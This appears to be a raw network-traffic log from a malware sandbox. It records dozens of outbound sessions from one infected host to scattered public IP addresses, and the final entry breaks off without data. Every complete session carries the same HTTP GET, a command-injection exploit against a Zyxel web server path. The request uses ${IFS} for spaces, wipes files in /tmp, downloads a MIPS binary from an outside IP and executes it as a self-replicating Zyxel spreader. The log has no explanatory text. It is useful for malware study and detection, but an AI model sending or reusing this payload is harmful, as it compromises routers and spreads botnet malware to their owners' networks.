                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2937192.168.2.234186270.53.28.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.301305056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2938192.168.2.235001671.21.97.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.301357031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2939192.168.2.2345786146.98.27.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.301398993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2940192.168.2.2350458112.154.14.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.301444054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2941192.168.2.2342584126.236.105.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.301477909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2942192.168.2.2347458124.180.146.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.301515102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2943192.168.2.2336172139.6.181.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.301544905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2944192.168.2.234469681.65.59.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.301594973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2945192.168.2.2336760108.154.95.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.301631927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2946192.168.2.235941282.20.182.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.301668882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2947192.168.2.2348554157.191.19.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.301701069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2948192.168.2.2343634199.18.105.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.301728964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2949192.168.2.2336262134.38.106.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.301768064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2950192.168.2.234940873.40.192.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.301800013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2951192.168.2.2358712159.181.212.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.301855087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2952192.168.2.2336812150.244.57.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.301901102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2953192.168.2.2345234106.163.179.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.301919937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2954192.168.2.2358362111.190.131.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.301985979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2955192.168.2.2348026100.173.95.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.302025080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2956192.168.2.234290480.220.202.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.302061081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2957192.168.2.2347272154.195.49.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.302087069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2958192.168.2.2355382148.187.119.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.302129984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2959192.168.2.234492048.58.153.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.302166939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2960192.168.2.234799094.140.159.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.302217007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2961192.168.2.2342858165.45.79.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.302253962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2962192.168.2.2360758120.47.42.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.302280903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2963192.168.2.235663023.88.205.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.302340984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2964192.168.2.2339822202.136.210.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.302376986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2965192.168.2.2344800139.139.208.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.302426100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2966192.168.2.2353330188.21.58.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.302470922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2967192.168.2.2343550152.20.21.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.302512884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2968192.168.2.235430472.135.45.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.302561045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2969192.168.2.233647014.215.218.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.302606106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2970192.168.2.2349562109.3.158.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.302647114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2971192.168.2.2344572193.190.161.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.302690983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2972192.168.2.2355876194.168.175.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.302726984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2973192.168.2.234861050.47.163.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.302778959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2974192.168.2.234851238.38.65.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.302818060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2975192.168.2.2353204128.220.110.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.302853107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2976192.168.2.2351114111.222.147.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.302894115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2977192.168.2.2345432199.62.241.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.302937984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2978192.168.2.2351834203.198.214.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.302979946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2979192.168.2.235461469.141.222.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.303013086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2980192.168.2.2336462117.41.71.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.303046942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2981192.168.2.2357052211.108.233.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.303081036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2982192.168.2.2338526204.236.118.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.303124905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2983192.168.2.233962458.253.38.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.303148985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2984192.168.2.2357266130.199.13.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.303183079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2985192.168.2.2360782186.200.209.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.303244114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2986192.168.2.234653436.226.20.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.303262949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2987192.168.2.234215662.188.189.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.303286076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2988192.168.2.2345988170.74.228.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.303342104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2989192.168.2.2334262216.127.149.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.303369999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2990192.168.2.2337234209.211.22.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.303414106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2991192.168.2.2352378134.24.213.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.303447008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2992192.168.2.2357136141.172.165.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.303478956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2993192.168.2.235201876.226.148.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.303535938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2994192.168.2.234268499.254.64.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.303584099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2995192.168.2.233919270.234.248.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.303622007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2996192.168.2.2356190153.59.144.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.303677082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2997192.168.2.2352688108.106.179.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.303702116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2998192.168.2.234719453.185.108.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.303817987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2999192.168.2.2358340182.67.0.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:17.303848028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3000192.168.2.2338278167.238.124.107443
                                                TimestampBytes transferredDirectionData
